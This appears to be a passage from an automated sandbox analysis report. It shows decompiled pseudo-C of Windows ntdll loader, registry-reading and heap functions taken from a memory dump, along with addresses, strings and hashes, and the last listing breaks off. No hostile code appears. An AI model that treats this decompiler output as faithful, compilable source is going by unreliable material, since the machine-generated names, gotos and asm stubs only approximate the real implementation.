							if(E0182934A() != 0) {
								_t159 = E0189A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1905780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E01895510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1905780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0182849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E01828999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E01828999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x1905c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x1905c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E01832280(_t92, 0x19086cc);
															_t94 = E018E9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E018461A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x1905c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E01828A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x1905c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x1905c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0185F380(_t136, 0x17f1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E01832280(_t108, 0x19086cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E018461A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E018E9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E0182FFB0(_t118, _t156, 0x19086cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E01859A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x01828799
0x0182879d
0x018287a1
0x018287a3
0x018287a8
0x018287c3
0x018287c3
0x018287c8
0x018287d1
0x018287d4
0x018287d8
0x018287e5
0x018287ec
0x01879bfe
0x01879c00
0x01879c02
0x01879c08
0x01879c0d
0x01879c0f
0x01879c14
0x01879c2d
0x01879c32
0x01879c37
0x01879c3a
0x01879c3c
0x01879c42
0x01879c42
0x01879c3c
0x01879c02
0x018287da
0x018287df
0x018287e3
0x00000000
0x00000000
0x018287e3
0x018287f2
0x00000000
0x018287fb
0x018287fd
0x018287fe
0x0182880e
0x0182880f
0x01828810
0x01828814
0x0182881a
0x0182881c
0x0182881f
0x01828821
0x01828822
0x01828824
0x01828826
0x0182882c
0x0182882e
0x01879c48
0x01879c48
0x01828834
0x01828834
0x01828837
0x00000000
0x00000000
0x01828837
0x0182882e
0x0182883d
0x01828840
0x01828843
0x01828846
0x01828849
0x0182884c
0x0182884e
0x01828850
0x01828852
0x01828854
0x01828857
0x018288b4
0x018288b6
0x018288b6
0x01828859
0x01828859
0x01828859
0x01828861
0x01828866
0x0182886a
0x0182893d
0x01828941
0x00000000
0x01828947
0x01828947
0x0182894a
0x0182894c
0x00000000
0x01828952
0x01828955
0x0182895a
0x0182895d
0x0182895d
0x0182895f
0x01828961
0x01828961
0x01828968
0x00000000
0x00000000
0x0182896a
0x0182896b
0x0182896e
0x00000000
0x01828970
0x01828970
0x01828970
0x01828970
0x01828972
0x01828972
0x01828974
0x00000000
0x0182897a
0x0182897a
0x0182897d
0x00000000
0x01828983
0x01879c65
0x01879c6d
0x01879c72
0x01879c75
0x01879c75
0x01879c82
0x01879c86
0x01879c87
0x01879c88
0x01879c89
0x01879c8c
0x01879c90
0x01879c95
0x01879c97
0x01879ca0
0x01879ca3
0x01879ca9
0x01879ca9
0x00000000
0x01879ca9
0x01879ca3
0x00000000
0x01879c97
0x0182897d
0x00000000
0x01828974
0x01828988
0x01828992
0x01828996
0x00000000
0x01828996
0x0182894c
0x00000000
0x01828870
0x0182887b
0x0182887d
0x0182887f
0x01828881
0x01828884
0x01828884
0x01828886
0x01828889
0x0182888c
0x0182888e
0x01828891
0x01828891
0x01828898
0x00000000
0x00000000
0x0182889a
0x0182889b
0x0182889e
0x00000000
0x00000000
0x018288a0
0x018288a8
0x018288b0
0x018288b2
0x018288d3
0x018288d5
0x00000000
0x018288d7
0x018288db
0x018288dc
0x018288e0
0x018288e8
0x018288ee
0x018288f0
0x018288f3
0x018288fc
0x01828901
0x01828906
0x0182890c
0x0182890c
0x0182890f
0x01828916
0x01828917
0x01828918
0x01828919
0x0182891a
0x0182891f
0x01828921
0x01879c52
0x01879c55
0x01879c5b
0x01879cac
0x01879cc0
0x01879cc0
0x01879c55
0x01828927
0x01828927
0x0182892f
0x01828933
0x00000000
0x018288f5
0x018288f5
0x00000000
0x018288f7
0x018288f7
0x018288fa
0x00000000
0x00000000
0x00000000
0x00000000
0x018288fa
0x018288f5
0x018288f3
0x00000000
0x018288d5
0x00000000
0x018288b2
0x018288c9
0x00000000
0x018288c9
0x0182887f
0x0182886a
0x01828857
0x01828852
0x018288bf
0x018288bf
0x018287aa
0x018287ad
0x018287ae
0x018287b4
0x018287b5
0x018287b6
0x018287b8
0x018287bd
0x018287c1
0x018287f4
0x018287fa
0x00000000
0x00000000
0x00000000
0x018287c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01879C18
LdrpDoPostSnapWork, xrefs: 01879C1E
minkernel\ntdll\ldrsnap.c, xrefs: 01879C28

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 2994545307-1948996284
Opcode ID: bfc99952916eb70a50ce098d431bda310419f1b59061a8b4ca10546543d1c002
Instruction ID: df00da63d25d45ced9015279d81a2da27b03f55fd36f391d2230369eadd3c931
Opcode Fuzzy Hash: bfc99952916eb70a50ce098d431bda310419f1b59061a8b4ca10546543d1c002
Instruction Fuzzy Hash: CB91F371A0022A9FEF1ADF5DC48097AB7F5FF96314B054069E905EB241DB70EB81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 01827E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E01827E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0182CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0181C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x1905780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01895510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x1905780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E01837D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01837D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01897016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E01837D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E01837D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01897016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0184A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0181B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x01827e4c
0x01827e50
0x01827e55
0x01827e58
0x01827e5d
0x01827e71
0x01827f33
0x01827e77
0x01827e77
0x01827e79
0x01827e79
0x01827e7e
0x01827f45
0x01879848
0x00000000
0x01879848
0x01827f4e
0x01827f53
0x01827f5a
0x00000000
0x00000000
0x0187985a
0x01879862
0x01879866
0x00000000
0x0187986c
0x00000000
0x0187986c
0x01827e84
0x01827e84
0x01827e8d
0x01879871
0x01827eb8
0x01827ec0
0x01827ec0
0x01827e9a
0x0187987e
0x00000000
0x00000000
0x01879884
0x0187988b
0x018798a7
0x018798ac
0x018798b1
0x018798b6
0x018798b8
0x018798b8
0x018798b9
0x00000000
0x018798b9
0x01827ea0
0x01827ea7
0x00000000
0x00000000
0x01827eac
0x01827eb1
0x01827ec6
0x01827ed0
0x018798cc
0x01827ed6
0x01827ed6
0x01827ed6
0x01827ede
0x01827ee3
0x018798e3
0x018798f0
0x01879902
0x018798f2
0x018798fb
0x018798fb
0x01879907
0x0187991d
0x0187991d
0x01879907
0x018798e3
0x01827ef0
0x01827f14
0x01827f14
0x01827f1e
0x01879946
0x01827f24
0x01827f24
0x01827f24
0x01827f2c
0x0187996a
0x01879975
0x01879975
0x0187997e
0x01879993
0x01879993
0x0187997e
0x00000000
0x01827ef2
0x01827efc
0x01827f0a
0x01827f0e
0x01879933
0x00000000
0x01879933
0x00000000
0x01827f0e
0x00000000
0x00000000
0x00000000
0x01827eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 01879891
minkernel\ntdll\ldrmap.c, xrefs: 018798A2
LdrpCompleteMapModule, xrefs: 01879898

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 435e4dec49bb233e3c48683e2286d0b55f2eea145b1e3a2c3b6b7af51ff0031f
Instruction ID: ed35af64828abdad00216c3902f5292f0dcbb27b59c491909b8d11791c437482
Opcode Fuzzy Hash: 435e4dec49bb233e3c48683e2286d0b55f2eea145b1e3a2c3b6b7af51ff0031f
Instruction Fuzzy Hash: 8B51E275A04749DBEB22CB5DC944B2A7BA4BF50728F040599EA51DB3E1D730EB80CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0181E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0181E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0181F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E018595D0();
						}
						if(_t78 != 0) {
							L018377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0185FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0185BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E01859600();
					if(_t97 < 0) {
						goto L6;
					}
					E0185BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0181F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0185BB40(_t83, _t102 + 0x24, _t78);
								if(L018243C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0185BB40(_t84, _t102 + 0x24, _t94);
									if(L018243C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0181e620
0x0181e628
0x0181e62f
0x0181e631
0x0181e635
0x0181e637
0x0181e63e
0x01875503
0x01875503
0x0181e64c
0x0181e64c
0x0181e651
0x00000000
0x00000000
0x0181e661
0x0181e665
0x0187542a
0x0181e715
0x0181e71a
0x0181e71c
0x0181e720
0x0181e720
0x0181e727
0x0181e736
0x0181e736
0x0181e743
0x0181e743
0x0181e673
0x0181e678
0x0181e67d
0x0181e682
0x0181e685
0x0181e692
0x0181e69b
0x0181e6a3
0x0181e6ad
0x0181e6b1
0x0181e6b2
0x0181e6bb
0x0181e6bf
0x0181e6c0
0x0181e6c8
0x0181e6cc
0x0181e6d5
0x0181e6d9
0x00000000
0x00000000
0x0181e6e5
0x0181e6ea
0x0181e6f9
0x0181e70b
0x0181e70f
0x01875439
0x0187545e
0x0187545e
0x00000000
0x0187545e
0x0187543b
0x0187543e
0x01875440
0x01875445
0x01875472
0x01875475
0x0187548d
0x01875493
0x018754a9
0x00000000
0x00000000
0x018754ab
0x018754b4
0x018754bc
0x018754c8
0x018754de
0x018754fb
0x018754e0
0x018754e6
0x018754eb
0x018754eb
0x018754de
0x00000000
0x018754bc
0x01875477
0x0187547a
0x01875480
0x01875483
0x01875486
0x0187548b
0x00000000
0x00000000
0x00000000
0x0187548b
0x00000000
0x00000000
0x00000000
0x00000000
0x01875447
0x01875447
0x01875447
0x01875447
0x0187544e
0x00000000
0x00000000
0x01875450
0x01875452
0x01875455
0x0187545a
0x00000000
0x00000000
0x00000000
0x0187545c
0x0187546a
0x0187546d
0x0187546f
0x00000000
0x0187546f
0x0181e70f

Strings

InstallLanguageFallback, xrefs: 0181E6DB
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0181E68C
@, xrefs: 0181E6C0

Memory Dump Source

Source File: 00000005.00000002.342946293.00000000017F0000.00000040.00000001.sdmp, Offset: 017F0000, based on PE: true

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: 47b4b43f516c4fa9fc1406bac25d5217a9b6f85c146cec320cb79af273b6fbea
Instruction ID: bf7e2eb60f89e45594089461dc656ee4e4c4df35440d128bb0c77a42228ab4b0
Opcode Fuzzy Hash: 47b4b43f516c4fa9fc1406bac25d5217a9b6f85c146cec320cb79af273b6fbea
Instruction Fuzzy Hash: E8518DB66083469BD715DF68C480A6BB7E8AF98714F05092EFA85D7240EB34DB44C7A2

Uniqueness

Uniqueness Score: -1.00%

Function 018DE539, Relevance: 2.8, Strings: 2, Instructions: 261
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E018DE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v40;
				char _v44;
				intOrPtr _v48;
				signed int _v52;
				unsigned int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				signed int _v72;
				void* __ebx;
				void* __edi;
				char _t87;
				signed int _t90;
				signed int _t94;
				signed int _t100;
				intOrPtr* _t113;
				signed int _t122;
				void* _t132;
				void* _t135;
				signed int _t139;
				signed int* _t141;
				signed int _t146;
				signed int _t147;
				void* _t153;
				signed int _t155;
				signed int _t159;
				char _t166;
				void* _t172;
				void* _t176;
				signed int _t177;
				intOrPtr* _t179;

				_t179 = __ecx;
				_v48 = __edx;
				_v68 = 0;
				_v72 = 0;
				_push(__ecx[1]);
				_push( *__ecx);
				_push(0);
				_t153 = 0x14;
				_t135 = _t153;
				_t132 = E018DBBBB(_t135, _t153);
				if(_t132 == 0) {
					_t166 = _v68;
					goto L43;
				} else {
					_t155 = 0;
					_v52 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v56 = __ecx[1];
					if( *__ecx >> 8 < 2) {
						_t155 = 1;
						_v52 = 1;
					}
					_t139 = _a4;
					_t87 = (_t155 << 0xc) + _t139;
					_v60 = _t87;
					if(_t87 < _t139) {
						L11:
						_t166 = _v68;
						L12:
						if(_t132 != 0) {
							E018DBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
						}
						L43:
						if(_v72 != 0) {
							_push( *((intOrPtr*)(_t179 + 4)));
							_push( *_t179);
							_push(0x8000);
							E018DAFDE( &_v72,  &_v60);
						}
						L46:
						return _t166;
					}
					_t90 =  *(_t179 + 0xc) & 0x40000000;
					asm("sbb edi, edi");
					_t172 = ( ~_t90 & 0x0000003c) + 4;
					if(_t90 != 0) {
						_push(0);
						_push(0x14);
						_push( &_v44);
						_push(3);
						_push(_t179);
						_push(0xffffffff);
						if(E01859730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
							_push(_t139);
							E018DA80D(_t179, 1, _v40, 0);
							_t172 = 4;
						}
					}
					_t141 =  &_v72;
					if(E018DA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
						_v64 = _a4;
						_t94 =  *(_t179 + 0xc) & 0x40000000;
						asm("sbb edi, edi");
						_t176 = ( ~_t94 & 0x0000003c) + 4;
						if(_t94 != 0) {
							_push(0);
							_push(0x14);
							_push( &_v24);
							_push(3);
							_push(_t179);
							_push(0xffffffff);
							if(E01859730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
								_push(_t141);
								E018DA80D(_t179, 1, _v20, 0);
								_t176 = 4;
							}
						}
						if(E018DA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
							goto L11;
						} else {
							_t177 = _v64;
							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
							_t100 = _v52 + _v52;
							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
							 *(_t132 + 0x10) = _t146;
							asm("bsf eax, [esp+0x18]");
							_v52 = _t100;
							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
							_t47 =  &_a8;
							 *_t47 = _a8 & 0x00000001;
							if( *_t47 == 0) {
								E01832280(_t179 + 0x30, _t179 + 0x30);
							}
							_t147 =  *(_t179 + 0x34);
							_t159 =  *(_t179 + 0x38) & 1;
							_v68 = 0;
							if(_t147 == 0) {
								L35:
								E0182B090(_t179 + 0x34, _t147, _v68, _t132);
								if(_a8 == 0) {
									E0182FFB0(_t132, _t177, _t179 + 0x30);
								}
								asm("lock xadd [eax], ecx");
								asm("lock xadd [eax], edx");
								_t132 = 0;
								_v72 = _v72 & 0;
								_v68 = _v72;
								if(E01837D50() == 0) {
									_t113 = 0x7ffe0388;
								} else {
									_t177 = _v64;
									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								}
								if( *_t113 == _t132) {
									_t166 = _v68;
									goto L46;
								} else {
									_t166 = _v68;
									E018CFEC0(_t132, _t179, _t166, _t177 + 0x1000);
									goto L12;
								}
							} else {
								L23:
								while(1) {
									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
										_t122 =  *_t147;
										if(_t159 == 0) {
											L32:
											if(_t122 == 0) {
												L34:
												_v68 = 0;
												goto L35;
											}
											L33:
											_t147 = _t122;
											continue;
										}
										if(_t122 == 0) {
											goto L34;
										}
										_t122 = _t122 ^ _t147;
										goto L32;
									}
									_t122 =  *(_t147 + 4);
									if(_t159 == 0) {
										L27:
										if(_t122 != 0) {
											goto L33;
										}
										L28:
										_v68 = 1;
										goto L35;
									}
									if(_t122 == 0) {
										goto L28;
									}
									_t122 = _t122 ^ _t147;
									goto L27;
								}
							}
						}
					}
					_v72 = _v72 & 0x00000000;
					goto L11;
				}
			}

0x018de547
0x018de549
0x018de54f
0x018de553
0x018de557
0x018de55a
0x018de55c
0x018de55f
0x018de561
0x018de567
0x018de56b
0x018de7e2
0x00000000
0x018de571
0x018de575
0x018de577
0x018de57b
0x018de57c
0x018de57d
0x018de57e
0x018de57f
0x018de588
0x018de58f
0x018de591
0x018de592
0x018de592
0x018de596
0x018de59e
0x018de5a0
0x018de5a6
0x018de61d
0x018de61d
0x018de621
0x018de623
0x018de630
0x018de630
0x018de7e6
0x018de7eb
0x018de7ed
0x018de7f4
0x018de7fa
0x018de7ff
0x018de7ff
0x018de80a
0x018de812
0x018de812
0x018de5ab
0x018de5b4
0x018de5b9
0x018de5be
0x018de5c0
0x018de5c2
0x018de5c8
0x018de5c9
0x018de5cb
0x018de5cc
0x018de5d5
0x018de5e4
0x018de5f1
0x018de5f8
0x018de5f8
0x018de5d5
0x018de602
0x018de616
0x018de63d
0x018de644
0x018de64d
0x018de652
0x018de657
0x018de659
0x018de65b
0x018de661
0x018de662
0x018de664
0x018de665
0x018de66e
0x018de67d
0x018de68a
0x018de691
0x018de691
0x018de66e
0x018de6b0
0x00000000
0x018de6b6
0x018de6bd
0x018de6c7
0x018de6d7
0x018de6d9
0x018de6db
0x018de6de
0x018de6e3
0x018de6f3
0x018de6fc
0x018de700
0x018de700
0x018de704
0x018de70a
0x018de70a
0x018de713
0x018de716
0x018de719
0x018de720
0x018de761
0x018de76b
0x018de774
0x018de77a
0x018de77a
0x018de78a
0x018de791
0x018de799
0x018de79b
0x018de79f
0x018de7aa
0x018de7c0
0x018de7ac
0x018de7b2
0x018de7b9
